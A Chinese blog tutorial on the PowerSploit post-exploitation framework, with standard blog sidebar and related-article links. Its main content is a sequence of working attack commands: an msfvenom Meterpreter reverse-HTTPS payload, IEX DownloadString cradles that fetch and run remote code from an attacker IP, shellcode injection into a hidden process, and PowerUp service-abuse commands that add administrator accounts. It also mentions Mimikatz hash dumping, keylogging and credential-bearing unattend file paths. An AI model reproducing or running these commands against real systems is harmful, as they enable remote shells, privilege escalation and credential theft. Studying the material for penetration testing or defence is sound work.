PowerShell渗透--PowerSploit(WEB安全攻防)

最新推荐文章于 2023-05-19 00:03:08 发布
最新推荐文章于 2023-05-19 00:03:08 发布
阅读量3.1k 收藏 13
点赞数 2
分类专栏: PowerShell

         PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为:github.com/PowerShellMafia/PowerSploit

  1. 安装
    1. 下载程序目录

git clone https://github.com/PowerShellMafia/PowerSploit

    1. 开启Apache服务
    2. 将下载好的文件夹移动到 /var/www/html目录
    3. 在浏览器输入 127.0.0.1/PowerSploit 即可看到PowerSploit各模块
  2. 各模块功能
    1. AntivirusBypass  #发现杀毒软件的查杀特征
    2. CodeExecution  #在目标主机上执行代码
    3. Exfiltration  #目标主机上的信息收集工具
    4. Mayhem  #蓝屏等破坏工具
    5. Persistence  #后门脚本(持久性控制)
    6. Recon  #以目标主机为跳板,进行内网信息侦查
    7. ScriptModification  #在目标主机上创建或修改脚本

 

  1. PowerSploit脚本攻击实战
    1. Invoke-Shellcode – 常用于将ShellCode插入指定的进程ID或本地PowerShell中

直接执行Shellcode,反弹Meterpreter Shell

  1. 启用后门模块exploit/multi/handler,并选择payload

windows/meterpreter/reverse_https

  1. 生成一个PowerShell脚本木马

msfvenom –p windows/meterpreter/reverse_https LHOST=10.238.207.80 LPORT=4444 –f powershell –o /var/www/html/test

  1. 在目标机器上下载脚本

IEX(New-Object Net.WebClient).DownloadString(“http://10.238.207.80/PowerSploit/CodeExecution/Invoke-Shellcode.ps1”)

  1. 下载木马

IEX(New-Object Net.WebClient).DownloadString(“http://10.238.207.80/test”)

  1. 执行木马

Invoke-Shellcode –Shellcode($buf) –Force

                                  

指定进程注入Shellcode反弹Meterpreter

  1. 下载脚本以及木马

IEX(New-Object Net.WebClient).DownloadString(“10.238.207.80/PowerSploit/CodeExecution/Invoke-Shellcode.ps1”)

 

IEX(New-Object Net.WebClient).DownloadString(“http://10.238.207.80/test”)

  1. 查看当前进程

Get-Process 或 ps

  1. 创建一个名为notepad的新进程,并设置为隐藏

Start-Process C:\windows\system32\notepad.exe –WindowStyle Hidden

  1. 使用Invoke-Shellcode脚本注入

Invoke-Shellcode -ProcessID <进程ID> -Shellcode($buf) –Force

 

  1. Invoke-DLLInjection – DLL注入脚本
  2. Invoke-Portscan – 用于端口扫描
  3. Invoke-Mimikatz – 获取Hash
  4. Get-Keystrokes – 记录键盘

 

  1. PowerUp攻击模块

是Privesc模块下的脚本,拥有众多用来寻找目标主机windows服务漏洞进行提权的使用脚本

  1. 加载脚本

Import-Module .\PowerUp.ps1

  1. 常用模块
    1. Invoke-AllChecks  #自动执行PowerUp下所有的脚本来检查目标主机

命令:Invoke-AllChecks

  1. Find-PathDllHijack  #检查当前%PATH%的哪些目录是用户可以写入的

命令:Find-PathDllHijack

  1. Get-ApplicationHost  #利用系统上的application.config文件恢复加密过的应用池和虚拟目录的密码

命令:Get-ApplicationHost

         Get-Application | Format-Table –Autosize #列表显示

  1. Get-RegistryAlwaysInstallElevated  #检测AlwaysInstallElevated注册表是否被设置,如果被设置,意味着MSI文件是以SYSTEM权限运行的

命令:Get-RegistryAlwaysInstallElevated

  1. Get-RegistryAutoLogon  #检测windows注册表的AutoAdminLogon项有没有被设置,可查询被设置默认的用户名密码

命令:Get-RegistryAutoLogon

  1. Get-ServiceDetail  #返回某服务的信息

命令:Get-ServiceDetail –ServiceName DHCP #获取DHCP服务详细信息

  1. Get-ServiceFilePermission  #检测当前用户能够在哪些服务的目录写入相关的可执行文件(可以通过这些文件提权)

命令:Get-ServiceFilePermission

  1. Test-ServiceDaclPermission  #检测所有可用的服务,并尝试对这些打开的服务进行修改(若可修改,返回服务对象)

命令:Test-ServiceDaclPermission

  1. Get-ServiceUnquoted  #用于检查服务路径,返回包含空格但不带引号的服务路径

命令:Get-ServiceUnquoted

  1. Get-UnattendedInstallFile  #检查以下路径,查找是否存在这些文件(文件中可能包含部署凭据)
    1. C:\sysprep\sysprep.xml
    2. C:\sysprep\sysprep.inf
    3. C:\sysprep.inf
    4. C:\Windows\Panther\Unattended.xml
    5. C:\Windows\Panther\Unattend\Unattended.xml
    6. C:\Windows\Panther\Unattend.xml
    7. C:\Windows\Panther\Unatten\Unattend.xml
    8. C:\Windows\System32\Sysprep\unattend.xml
    9. C:\Windows\System32\Sysprep\Panther\unattend.xml

命令:Get-UnattendedInstallFile

  1. Get-ModifiableRegistryAutoRun  #检查开机自启动的应用程序路径和注册表键值,返回当前用户可修改的程序路径

命令:Get-ModifiableRegistryAutoRun

  1. Get-ModifiableScheduledTaskFile  #返回当前用户能够修改的计划任务程序的名称和路径

命令:Get-ModifiableScheduledTaskFile

  1. Get-Webconfig  #返回当前服务器上web.config文件中的数据库连接字符串的明文

命令:Get-Webconfig

  1. Invoke-ServiceAbuse  #修改服务来添加用户到指定组,并可以通过设置- Command参数触发添加用户的自定义命令

命令:Invoke-ServiceAbuse -ServiceName VulnSVC #添加默认账号

         Invoke-ServiceAbuse -ServiceName VulnSVC -UserName “..” #指定添加的域账号

         Invoke-ServiceAbuse -ServiceName VulnSVC -UserName <> -Password <> -LocalGroup “Administrator” #添加指定用户,密码到指定组

         Invoke-ServiceAbuse -ServiceName VulnSVC -Command “..” #自定义执行命令

  1. Restore-ServiceBinary  #恢复服务的可执行文件到原始目录

命令:Restore-ServiceBinary -ServiceName VulnSVC

  1. Test-ServiceDaclPermission  #检查某个用户是否在服务中有自由访问控制的权限,结果返回布尔类型

命令:Test-ServiceDaclPermission -ServiceName VulnSVC

  1. Write-HijackDll  #输出一个自定义命令且能够自我删除的bat文件到$env:Temp\debug.bat,并输出一个能够启动这个bat文件的DLL
    1. Write-UserAddMSL  #生成一个安装文件,运行这个安装文件后会反弹添加用户的对话框

命令:Write-UserAddMSL

  1. Write-ServiceBinary  #用于预编译C#服务的可执行文件,默认创建一个管理员账号,可以通过Command自定义命令

命令:Write-ServiceBinary –ServiceName VulnSVC #添加默认账号

         Write-ServiceBinary –ServiceName VulnSVC –UserName “..” #指定添加域账号

         Write-ServiceBinary –ServiceName VulnSVC –UserName <> -Password <> #指定添加用户,密码到指定组

         Write-ServiceBinary –ServiceName VulnSVC –Command “..” #自定义执行命令

  1. Install-ServiceBinary  #通过Write-ServiceBinary写一个C#的服务来添加用户,基本用法与Write-ServiceBinary相同

区别是,前者生成可执行文件,后者直接安装服务

小英雄宋人头
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PowerShell-7.2.6-win-x64.msi
10-19
PowerShell-7.2.6-win-x64 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。
PowerSploit攻击
weixin_45007073的博客
05-07 399
PowerSploit简介各模块功能Invoke-Shellcode 简介 PowerSploit是一款后渗透框架,主要用于信息侦察、权限提升、权限维持。它在github上可以下载 各模块功能 模块 功能 AntivirusBypass 发现杀毒软件的查杀特征 CodeExecution 在目标主机上执行代码 Exfiltration 目标主机上的信息搜集工具 Mayhem 蓝屏等破坏性脚本 Persistence 后门脚本 Recon 以目标主机为跳板进行内网信息侦察
PowerShell攻击指南
鸡蛋炒鸡蛋
03-03 3424
什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力,powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的windows版本中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。
powersploit介绍以及攻击实战
weixin_43152809的博客
01-02 1829
powersploit是一款基于powershell的后渗透框架软件,包含很多powershell攻击脚本,主要用于信息侦察、权限提升、权限维持 下载地址 powersploit安装 git命令下载 git clone https://github.com/PowerShellMafia/PowerSploit/ 随后打开apache服务器,将下载的文件上传到www目录下 按照上图介绍powersploit各模块的功能 AntivirusBypass 发现杀毒软件的查杀特征 CodeExecutio
Powershell攻击指南1——PowerSploit
willow_liang的博客
12-05 1424
1.1PowerShell技术 灵活且能功能化管理Windows系统,一旦攻击者可以在计算机上执行代码,就可下载powershell脚本(.ps1)到磁盘中执行,甚至可以直接在内存中执行。 常用的powershell攻击工具: PowerSploit: 这是众多owehShe攻击工具中被广泛使用的PoweShel后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包含下载和执行、键盘记
powersploit简介
weixin_30703911的博客
08-30 604
一、PowerSploit简介 PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。 Powershell的优点: 1.代码运行在内存中可以不去接触磁盘 2.从另一个系统中下载代码并执行 3.很多安全产品并不能监测到powershell的活动 4.cmd.exe通常被阻止运行,但是...
PowerShell说“此系统上的脚本执行被禁用。”
p15097962069的博客
12-07 5016
我正在尝试运行一个从cmd.exe调用powershell脚本的cmd文件,并且出现以下错误: 无法加载Management_Install.ps1因为在此系统上禁用了脚本的执行。
Powershell渗透框架
HAKUNAMATATATTA的博客
01-16 1230
Windows PowerShell 是 Microsoft 创建的基于任务的自动化命令行Shell和相关脚本语言,基于 .NET 框架。是Microsoft的新Shell,它将旧的命令提示符(CMD)功能与具有内置系统管理功能的新脚本指令集结合在一起。用于控制和自动化管理Windows操作系统和运行在操作系统上的应用。被广泛用于渗透测试等方面,在不需要写入磁盘的情况下执行命令,也可以逃避 Anti-Virus 检测。
powershell渗透框架
weixin_53747497的博客
05-19 203
Windows PowerShell 是 Microsoft 创建的基于任务的自动化命令行Shell和相关脚本语言(ps1),基 于 .NET 框架。• 是Microsoft的新Shell,它将旧的命令提示符(CMD)功能与具有内置系统管理功能的新脚本指令集 结合在一起。用于控制和自动化管理Windows操作系统和运行在操作系统上的应用,被广泛用于渗透测试等方面.
Empire – PowerShell渗透攻击框架
banacyo14206的博客
09-12 635
0x01 简介 Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合;...
powershell 利用提权empire使用Powersploit的使用
代码审计
04-20 2068
windows 自带的一个组件 https://www.pstips.net/powershell-online-tutorials 信息网站 Powershell是一种命令行shell和脚本环境.通过使用powershell,用户和脚本编写者可以对windows系统进行管理. 优点: Windows7 以上操作系统默认安装. Powershell脚本可以运行在内存中,无需写入磁盘(文件不落地) 可以调用.net类(C#) 可以用来管理活动目录 远程下载payload来执行 Powershell的基本
empire-web:PowerShell Empire Web界面
05-14
PowerShell帝国Web PowerShell Empire Web利用。 它是使用的Web界面。运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./...
PowerShell-7.0.0-win-x64.zip
03-30
这意味着Windows PowerShellPowerShell Core用户将能够在Windows、Linux和macOS上跨越使用相同版本的PowerShell,而PowerShell 7用户将与他们所依赖的Windows PowerShell模块具有非常高的兼容性。
PowerShell-7.0.3-winx64msi.rar
09-03
PowerShell7.0.3支持组策略编辑,增加新语言功能如三元运算符。基于SSH的远程处理。PowerShell 7 是专为云、本地和混合环境设计,PowerShell 7 可以与 Windows PowerShell 5.1 共存。
PowerShell-7.3.6-win-x64.msi
08-18
PowerShell-7.3.6-win-x64.msi
利用matlab对am,dsb,ssb,ask,fsk,bpsk信号进行正交调制解调仿真
最新发布
04-18
利用matlab对am,dsb,ssb,ask,fsk,bpsk信号进行正交调制解调仿真,并在不同信噪比条件下对其数字信号进行了误码率的计算。.rar
任务悬赏活动,带分销返佣
04-18
任务悬赏活动,带分销返佣
2024年互联网平台行业分析报告.pptx
04-18
行业分析报告
2024年中国控制膨胀合金箔行业研究报告.docx
04-18
2024年中国控制膨胀合金箔行业研究报告
powershell --和-有什么区别
05-27
"-" 和 "--" 在 PowerShell 中都用于表示参数和选项,但它们有不同的含义。 "-" 用于单个字母的短选项,例如 "-a","-b" 等,也可以用于一些命令的缩写,例如 "-Verbose" 可以缩写为 "-v"。 "--" 用于完整的参数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值